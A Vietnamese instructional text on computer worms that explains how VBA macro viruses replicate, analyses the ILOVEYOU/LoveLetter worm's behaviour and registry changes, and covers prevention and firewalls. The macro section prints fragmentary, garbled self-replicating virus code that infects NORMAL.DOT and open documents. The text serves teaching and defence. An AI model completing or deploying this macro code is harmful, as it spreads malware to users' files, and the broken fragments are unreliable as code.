Worm hiện đại đã tiến bộ vượt bậc, từ những kỹ thuật cơ bản đến sự phát triển của các phương thức tấn công và lỗ hổng trong phần mềm, hệ điều hành, tạo ra những con sâu máy tính có khả năng gây hại lớn.
Macro virus
Hiện nay, nhiều sâu máy tính đã lợi dụng macro để tự động thực thi mã khi có sự tương tác của người dùng với file văn bản Một ví dụ điển hình là virus worm macro Melissa, đã sử dụng kỹ thuật macro một cách hiệu quả để lây nhiễm qua email.
Macro trong MS Office là chương trình được lập trình bằng các ngôn ngữ như WordBasic và VBA (Visual Basic for Application) nhằm tự động hóa các thao tác trong các ứng dụng của Microsoft Office như Word, Excel và PowerPoint.
Các macro VBA được phát triển dưới dạng thủ tục hoặc hàm, cho phép chương trình viết bằng ngôn ngữ VBA truy cập vào các tài liệu, bảng tính, Microsoft Outlook hoặc các đối tượng ứng dụng khác để thực hiện việc đọc và ghi dữ liệu.
Nếu các macro được thiết kế có khả năng tự sao chép từ vị trí này sang vị trí khác, chúng sẽ trở thành virus máy tính vì có khả năng lây nhiễm, một đặc điểm quan trọng của virus máy tính.
Ngoài các macro do người sử dụng tự thiết kế, trong các ứng dụng của Microsoft Office có một số macro được tự động thi hành như :
AutoExec : Được thi hành mỗi khi chương trình ứng dụng được khởi động
AutoNew : Được thi hành để tạo một tài liệu/văn bản mới
AutoOpen : Được thi hành để mở một tài liệu đã có
AutoClose : Được thi hành để đóng một tài liệu đang mở
Các virus macro lây nhiễm qua nhiều kỹ thuật đa dạng, chủ yếu dựa vào khả năng sao chép macro giữa các file văn bản do các ứng dụng hỗ trợ Mỗi VBComponent có một đối tượng con là CodeModule, cho phép thao tác trên các module chương trình trong file văn bản Virus có thể tận dụng các thuộc tính và phương thức có sẵn để can thiệp trực tiếp vào các module này.
1 Thông qua thành phần VBProject của các đối tượng Microsoft Office Các macro được lưu trữ ngay trong file đối tượng (Document, WorkSheet, E-Mail) hoặc trong các tệp định dạng (Template) và được tham chiếu qua đối tượng Document hoặc WorkSheet Mỗi đối tượng Document đều có thành phần VBProject Trong VBProject có Container Object, là một VBComponents, chứa các thành phần VBA của file văn bản
2 Sử dụng các dịch vụ Import và Export Trong đối tượng VBComponents có một phương thức là Import, cho phép nhập thêm các thành phần VBA (Form/Module/Class) từ một file Mỗi thành phần VBA VBComponent cũng có một phương thức là Export cho phép xuất chính nó ra thành một file (.FRM, BAS, CLA) Mỗi khi muốn sao chép các chương trình virus sang một file văn bản mới, trước hết sử dụng lệnh Export để xuất chương trình ra một file, sau đó sử dụng lệnh Import để nhập chương trình virus vào file văn bản mới
3 Sử dụng OrganizerCopy Phương thức OrganizerCopy của đối tượng Application có thể được sử dụng để sao chép chương trình virus sang một file văn bản khác Giả sử trong file NormalTemplate đã có virus macro TEST01 (tên module virus – macro là TEST01 trong VBA)
For Each obj In ActiveDocument.VBProject.VBComponents
If obj.Name = "TEST01" Then DaNhiem = True
Thủ tục copy virus từ một file tài liệu đã bị nhiễm virus vào file NormalTemplate như sau :
For Each obj In NormalTemplate.VBProject.VBComponents
If obj.Name = "TEST01" Then DaNhiem = True
Macro Virus là loại virus lây lan qua các tệp tài liệu, trong đó tệp được sử dụng làm môi trường lây lan.
Tệp NORMAL.DOT thường được sử dụng làm công cụ lây lan virus vì hầu hết các tài liệu đều dựa vào định dạng chung từ tệp này.
Nguyên lý hoạt động ở đây cũng rất đơn giản Giả sử một tệp X đang được kích hoạt đã nhiễm virus Có hai khả năng xảy ra :
Tệp X là tệp NORMAL.DOT, Winword khi làm việc với một tệp khác, sẽ để đối tượng lây lan sang tài liệu đang được sử dụng (Active Document)
X là một tệp Document, đối tượng lây nhiễm sẽ là NORMAL.DOT
1 Trường hợp 1 : X là tệp Normal.Dot, khi này macro đầu tiên được kích hoạt sẽ phải là Macro Open, do phải mở Document (New or Old) công việc phải làm là thi hành đoạn chương trình kèm với Auto Macro Open Lưu ý rằng đoạn chương trình virus gắn vào trong Normal.dot là kèm với macro Open
2 Trường hợp 2 : X là tệp Active Document, lúc này macro được kích hoạt nên là Macro Close, vì Document đã được mở trước đó Công việc phải làm là thi hành đoạn chương trình kèm với Auto Macro Close
5 AD := ActiveDocument.VBProject.VBComponents.Item(1)
6 NT := NormalTemplate.VBProject.VBComponents.Item(1)
7 If AD isn‟t Infected Then F := AD, F1 := NT
8 If NT isn‟t Infected Then F :=NT, F1 :
9 If NT is Infected and AD is Infected Then a) Delete all lines in F.CodeModule b) Put the virus‟s sign into F c) F‟s Infection := TRUE a) You are in F1 now ! b) Delete all First Empty Lines in F1‟s CodeModule c) Insert String "Private Sub Document_Close()" into 1st Line in F d) Copy from 2nd to CountOfLine from F1 to F
If now you are in AD then Insert String "Hi, How are you ? "
Phương án 1, lây vào Normal.dot và Active Document với macro CLOSE Private Sub Document_Close()
CommandBars ("Tools").Controls("Macro").Enabled = True „False
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1) dt=2
If AD.Name "Daisy" Then
If DoIn = False Then Go To Destroy
If Sd >0 Then F.CodeModule.DeleteLines 1, Sd
If DoIn = False Then Go To Destroy
If Sd > 0 Then F.CodeModule.DeleteLines 1, Sd
F.CodeModule.AddFromString ("Private Sub Ducoment_Close()")
Do While F1.CodeModule.Lines(dt,1) ""
F.CodeModule.InsertLines dt, F1.CodeModule.Lines(dt, 1) dt = dt + 1
Selection.TypeText "Hi, I am here ! "
Phương án 2, lây vào Normal.dot với macro OPEN và Active Document với macro CLOSE
CommandBars ("Tools").Controls ("Macro").Enabled = True „False
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1) dt=2
If AD.Name "Daisy" Then
If NT.Name "Daisy" Then
If DoInN = False And DoInD = False Then Go To Destroy
If Sd > 0 Then F.CodeModule.DeleteLines 1, Sd
If DoInD = True Or DoInN = True Then
F.CodeModule.AddFromString("Private Sub Document_Close()")
F.CodeModule.AddFromString ("Pivate Sub Document_Open()")
Do While F1.CodeModule.Lines(dt,1) ""
F.CodeModule.InsertLines dt, F1.CodeModule.Lines(dt,1) dt = dt + 1
Selection.TypeText Date & "Hi, I am here ! "
Phân tích cách thức hoạt động của một số sâu
VBA.LoveLetter và các dạng khác của loại virus này
Loại virus này có khoảng 82 biến thể Dạng cuối cùng đó là VBS.Loveletter.CN
Vào sáng ngày 4 tháng 5 năm 2000, Trung tâm an ninh mạng Symantec đã nhận được nhiều yêu cầu từ người dùng về một loại worm mới xuất phát từ Manila, Philippines Loại worm này có khả năng lây lan rộng rãi và đã lây nhiễm hàng triệu máy tính trên toàn cầu.
Loại sâu này tự động gửi đến địa chỉ email trong Microsoft Outlook và lây lan qua phòng chat MIRC Nó ghi đè lên các file từ các trình điều khiển từ xa, bao gồm nhiều định dạng file như vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, htm, html, xls, ini, bat, com, avi, qt, mpg, mpeg, cpp, c, h, swd, psd, wri, mp3 và mp2.
Worm này thay đổi hầu hết các file bằng cách thêm đuôi mở rộng vbs, ví dụ như file image.jpg sẽ trở thành image.jpg.vbs Tuy nhiên, các file có phần mở rộng mp2 và mp3 sẽ không bị ảnh hưởng.
Mặt khác VBS.Loveletter cũng download một chú ngựa Trojan từ một website
Cách thức hoạt động của loại sâu này : (threat assessment)
Số lượng site nhiễm : 3 – 9 Phân bố địa lý : cao
Mức độ thiệt hại (đe dọa) : bình thường Khả năng gỡ bỏ : bình thường
Payload trigger : tấn công qua thư điện tử
Payload : ghi đè lên file
Phạm vi thư điện tử : Tự nó gửi đến tất cả các địa chỉ có trong hộp địa chỉ Outlook
Changes to files can occur by overwriting those with the following extensions: vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, html, xls, ini, bat, com, mp3, and, and mp.
Chúng có thể bị phát hiện bởi những phần mềm antivirus
Degrades performance : Làm giảm thiểu khả năng của email server
Chủ đề của email (subject of mail) : ILOVEYOU
Tên của phần đính kèm (name of attachment) : Love – letter – for- you.txt.vbs
Kích thước đính kèm : 10,307 bytes
Hướng chia sẻ (shared drives) : Viết đè lên file đã được xác định trên mạng
The infection method involves writing to files with various extensions, including vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, htm, html, xls, ini, bat, com, mp3, and mp2.
Khi hoạt động, worm tự nó sao chép tới thư mục \Windows\System cả mskernel32.vbs và LOVE-LETTER-FOR-YOU.TXT.vbs và tới thư mục
\Windows file Win32dll.vbs nó kiểm tra sự có mặt của Winfat32.exe trong thư mục \Windows\System
Nếu file này không tồn tại, worm sẽ đặt trình IE khởi động trang web với win-bugsfix.exe.Site này sẽ bị bắt
Nếu file này tồn tại, worm sẽ tạo khóa sau :
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-
Và thi hành trong suốt quá trình khởi động hệ thống Khi trình duyệt khởi động thì nó sẽ thay thế bằng một trang rỗng
Virus và Worm có khả năng lây nhiễm vào nhiều loại file trên ổ đĩa, bao gồm cả ổ đĩa mạng Virus chủ yếu nhắm đến các file có phần mở rộng vbs và vbe, trong khi Worm tìm kiếm các file với các định dạng như js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, html, xls, ini, bat, com, mp3, and, và mp2 Khi phát hiện các file này, Worm sẽ tiến hành lây nhiễm.
Virus ghi đè lên tất cả các file có phần mở rộng (.js, jse, ) bằng mã độc, đồng thời tạo một bản sao của file với phần mở rộng vbs Chẳng hạn, nếu file gốc có tên là House_pics.jpg, file bị ghi đè sẽ có tên là House_pics.jpg.vbs Sau khi ghi đè, file gốc sẽ bị xóa và những file này cần phải được xóa hoàn toàn, sau đó khôi phục từ bản sao dự phòng.
Tạo bản sao cho tất cả các file có phần mở rộng mp3 và mp2, sau đó ghi đè bằng mã nhiễm virus và thêm phần mở rộng vbs vào tên file Tiếp theo, thay đổi thuộc tính của các file gốc mp3 và mp2 để chúng không bị thay đổi trên ổ cứng, trong khi các file đã thay đổi sẽ bị xóa.
Khuyến cáo: Tránh thực thi các file đã bị ghi đè hoặc đổi tên bởi worm, vì điều này có thể làm cho worm hoạt động trở lại.
Worm phát tán qua việc tạo file Script.ini trong thư mục MIRC, gửi file LOVE-LETTER-FOR-YOU.HTM đến người dùng khác trong cùng phòng chat.
Worm sử dụng các hàm MAPI để kết nối với Microsoft Outlook và gửi thông điệp đến tất cả địa chỉ trong hộp thư của người dùng Worm lưu trữ một phần số địa chỉ đã gửi thông điệp trong Windows registry, đảm bảo rằng mỗi địa chỉ chỉ nhận được một lần thông điệp.
Chủ đề của thông điệp là :
Thân của thông điệp là : kindly check the attached LOVELETTER coming from me
File đính kèm vào thông điệp là LOVE-LETTER-FOR-YOU.TXT.vbs Cuối cùng virus gửi một file LOVE-LETTER-FOR-YOU.HTM đến thư mục \Windows\System
Bảng tóm tắt các đầu vào registry đã bị thay đổi :
Các khóa registry có thể bị thêm vào :
HKEY_LOCAL_MACHINE\Software\Microsoft\
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunServices\Win32DLL
HKEY_LOCAL_MACHINE\Software\Microsoft\
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunServices\ES32DLL
HKEY_LOCAL_MACHINE\Software\Microsoft\
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run\WIN-BUGFIX
Một hoặc một số chương trình bị thêm khóa như :
HKEY_USERS\\Software\Microsoft\
Các khóa registry sau có thể bị xóa :
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\Network\HideSharePwds
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\Network\DisablePwdCaching
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\Network\HideSharePwds
Thêm vào đó hàng trăm các giá trị registry DWORD có tiềm năng được tạo ra trong HKEY_USERS\\SOFTWARE\Microsoft\WAB
Trên cơ sở có bao nhiêu thông điệp thư điện tử được gửi ra ngoài Những khóa này sẽ được phân biệt cho mỗi máy
Các phiên bản khác của LOVELETTER
Trung tâm an ninh mạng đã phát hiện ra tới 82 phiên bản của virus loveletter
VBS.LoveLetter.A và VBS.LoveLetter.B là hai biến thể của virus LoveLetter VBS.LoveLetter.A có tên phát hiện là VBS.LoveLetter.A(1), với chủ đề "ILOVEYOU" và thông điệp yêu cầu người nhận kiểm tra file đính kèm có tên LOVE-LETTER-FOR-YOU.TXT.vbs Trong khi đó, VBS.LoveLetter.B (Lithuania) có tên phát hiện là VBS.LoveLetter.B(1) hoặc VBS.LoveLetter.B(HTM), với chủ đề thông điệp là "Susitikim shi vakara kavos puodukui…" và file đính kèm có tên giống loài 1.
Nhiều loại sâu máy tính hiện nay hoạt động tương tự nhau, dựa trên một số kỹ thuật chung, bao gồm việc hoạt động như một sâu thực thụ và sử dụng virus đính kèm file.
Mặc dù như vậy sâu loveletter vẫn cần sự tác động của con người là phải mở thư và tệp đính kèm để kích hoạt sự lây lan
Các biện pháp để ngăn chặn virus LoveLetter
1 Bạn không nên mở e-mail có cái tựa đề (subject) quá đã là
Virus "ILOVEYOU" có khả năng lây lan nhanh chóng qua email, bất kể ai gửi đi Khi xâm nhập vào máy tính của bạn bè hoặc người thân, nó sẽ lấy địa chỉ email từ sổ địa chỉ và gửi chính nó đến bạn Nếu bạn nhận được email có tiêu đề "ILOVEYOU", hãy ngay lập tức xóa nó khỏi hệ thống, bao gồm cả thư mục lưu trữ các email đã xóa (trong Outlook Express là folder Deleted Items).
2 Nếu đã nhận e-mail "ILOVEYOU" rồi, bạn hãy delete nó ngay và liên lạc với người gửi để báo tin cho người ấy biết máy người ấy đã bị con bọ Love làm hại rồi
CÁCH PHÒNG CHỐNG
Để ngăn chặn sự lây lan và thiệt hại do sâu máy tính và virus máy tính, có nhiều phương pháp hiệu quả Một số biện pháp phòng ngừa bao gồm việc sử dụng tường lửa (firewall), áp dụng các thủ thuật bảo mật, cài đặt phần mềm diệt virus, và triển khai các ý tưởng nhằm phát hiện và loại bỏ sâu, virus khỏi hệ thống.
3.1.Bức tường lửa(Firewall) Ứng dụng bức tường lửa là cách mà người ta thường dùng để bảo vệ cho hệ thông tin của mình khỏi những xâm nhập bất hợp pháp từ phía ngoài mạng cũng như phía trong mạng Hiểu đơn giản thì nó giống như trạm kiểm soát sẵn cho nó
Hệ thống firewall là một tập hợp các thành phần phần cứng và phần mềm, tạo thành rào chắn bảo vệ mạng khỏi các mạng không tin cậy Nó giữ lại và phân tích các gói dữ liệu đi vào và ra khỏi mạng, quyết định cho phép hoặc từ chối dựa trên chính sách bảo vệ đã thiết lập Firewall đóng vai trò quan trọng trong việc bảo vệ mạng riêng khi kết nối với các mạng khác.
Bằng việc kiểm soát tất cả các gói tin đi qua, firewall có thể thực hiện các chức năng cơ bản sau :
Kiểm soát quyền truy nhập :
Firewall chỉ cho phép người dùng hợp lệ truy cập tài nguyên mạng, xác định ai là người được phép, tài nguyên nào họ có quyền truy cập và cách thức truy cập Để thực hiện kiểm soát quyền truy cập, firewall cần hiểu rõ các dịch vụ và ứng dụng hoạt động trên mạng Hiện nay, chỉ những firewall có thành phần kiểm tra toàn bộ trạng thái mới có khả năng này Các thế hệ firewall lọc gói tin đầu tiên không nhận biết được ứng dụng, do đó không thể thực hiện kiểm soát quyền truy cập hiệu quả Trong khi đó, các Proxy ứng dụng thuộc thế hệ thứ hai không cung cấp hỗ trợ kịp thời cho các dịch vụ mới.
Để nâng cao quản lý truy cập, tường lửa có khả năng theo dõi, hiển thị, lập báo cáo và cảnh báo về lưu lượng mạng mà nó kiểm soát Nhờ vào tính năng này, quản trị viên hệ thống có thể theo dõi tất cả các kết nối đang hoạt động theo thời gian thực và có khả năng ngắt hoặc chặn các kết nối không mong muốn.
Ghi lại nhật ký làm việc :
Firewall có khả năng phân tích chi tiết thông tin truy cập và kết nối, bao gồm người dùng, loại dịch vụ, thời gian bắt đầu, đích đến, quá trình kết nối và các hành động thực hiện Ngoài ra, firewall cũng lập báo cáo phân tích chi tiết về các sự kiện này.
Các firewall cung cấp nhiều tùy chọn cảnh báo, bao gồm thông báo qua email và sử dụng giao thức SNMP để gửi các cảnh báo an ninh đến hệ thống quản trị mạng.
Ngăn chặn các kiểu tấn công thông thường
Một số firewall có thể chống được các kiểu tấn công như : Ipspoofing (giả mạo địa chỉ IP)…
3.1.2.1 Firewall lọc gói tin (Packet Filtering Firewall)
Firewall lọc gói tin kiểm tra từng gói tin IP để xác định xem nó có tuân thủ các quy tắc đã được thiết lập hay không, từ đó quyết định có cho phép gói tin đi qua hay không Các quy tắc này dựa trên thông tin trong tiêu đề lớp mạng và lớp giao vận của gói tin, cũng như hướng đi của gói tin trong tiêu đề, bao gồm cả từ trong mạng ra ngoài và ngược lại.
Các bộ lọc gói thường cho phép thao tác (chấp nhận hoặc từ chối) việc truyền dữ liệu dựa trên các điều khiển sau :
Giao tiếp vật lý mà gói tin đến từ đó Địa chỉ IP nguồn của gói tin Địa chỉ IP đích của gói tin
Kiểu giao thức tầng vận chuyển (TCP, UDP, ICMP)
Cổng nguồn của tầng vận chuyển
Cổng đích của tầng vận chuyển
Kỹ thuật lọc gói không hiểu các giao thức của tầng ứng dụng trong gói tin, mà chỉ áp dụng các quy tắc cho thông tin TCP/IP Do không kiểm tra dữ liệu tầng ứng dụng và không theo dõi trạng thái kết nối, loại firewall này được coi là giải pháp kém an toàn nhất trong các công nghệ firewall hiện nay.
Công nghệ firewall này cho phép truy cập qua firewall với số lượng kiểm tra tối thiểu, giúp tăng tốc độ xử lý Do xử lý ít dữ liệu hơn so với các kỹ thuật firewall khác, nó trở thành giải pháp nhanh nhất hiện có và thường được triển khai trong các thiết bị phần cứng như bộ định tuyến IP.
Firewall lọc gói thường thay đổi địa chỉ của các gói tin, khiến cho địa chỉ nguồn khi thông tin ra ngoài khác với địa chỉ của máy trạm nội bộ Quá trình này được gọi là chuyển dịch địa chỉ mạng (Network Address Translation - NAT), giúp bảo vệ các địa chỉ bên trong mạng.
3.1.2.2 Firewall mức kết nối (Circuit Level Firewall)
Firewall mức kết nối xác nhận tính hợp lệ của gói tin thông qua việc kiểm tra kết nối giữa hai tầng giao vận tương đương Để phê chuẩn phiên làm việc, firewall này yêu cầu thiết lập một thủ tục bắt tay hợp lệ cho giao thức tầng giao vận, thường là TCP, và chỉ cho phép gói tin dữ liệu được gửi đi sau khi thủ tục này hoàn tất Nó duy trì một bảng thông tin về các kết nối hợp lệ, bao gồm trạng thái phiên làm việc và thứ tự gói tin, cho phép gói tin dữ liệu đi qua khi thông tin phù hợp với mục trong bảng kết nối ảo Khi một kết nối kết thúc, thông tin liên quan sẽ bị xóa khỏi bảng kết nối ảo, đồng thời đóng kết nối ảo giữa hai tầng giao vận.
Khi một kết nối được thiết lập, firewall mức kết nối thường lưu giữ các thông tin về kết nối sau :
Nhận dạng phiên làm việc duy nhất đối với kết nối này, nó được sử dụng cho các mục đích theo dõi, giám sát
Trạng thái của kết nối : Đang bắt tay, đã thiết lập hay kết thúc Thông tin thứ tự các gói tin Địa chỉ IP nguồn Địa chỉ IP đích
Giao tiếp vật lý mà gói tin đến từ đó
Giao tiếp vật lý mà gói tin sẽ qua đó để đi ra
Firewall mức kết nối kiểm tra thông tin trong phần tiêu đề của mỗi gói tin để xác định quyền gửi và nhận dữ liệu giữa máy tính truyền và máy tính nhận.
Firewall mức kết nối cho phép truy cập với mức kiểm tra tối thiểu bằng cách xây dựng trạng thái kết nối Chỉ các gói tin thuộc về kết nối đã có trong bảng mới được phép đi qua firewall Khi nhận gói tin thiết lập kết nối, firewall kiểm tra các quy tắc để xác định tính hợp lệ của kết nối Nếu được phép, tất cả gói tin liên quan sẽ được định tuyến qua firewall mà không cần kiểm tra an ninh bổ sung.
Firewall mức kết nối thực hiện các biện pháp kiểm tra bổ sung để ngăn chặn việc giả mạo gói tin và đảm bảo rằng dữ liệu trong tiêu đề giao thức tầng giao vận tuân thủ đúng định nghĩa của giao thức Nhờ đó, chúng có khả năng phát hiện các kiểu dữ liệu gói tin bị sửa đổi.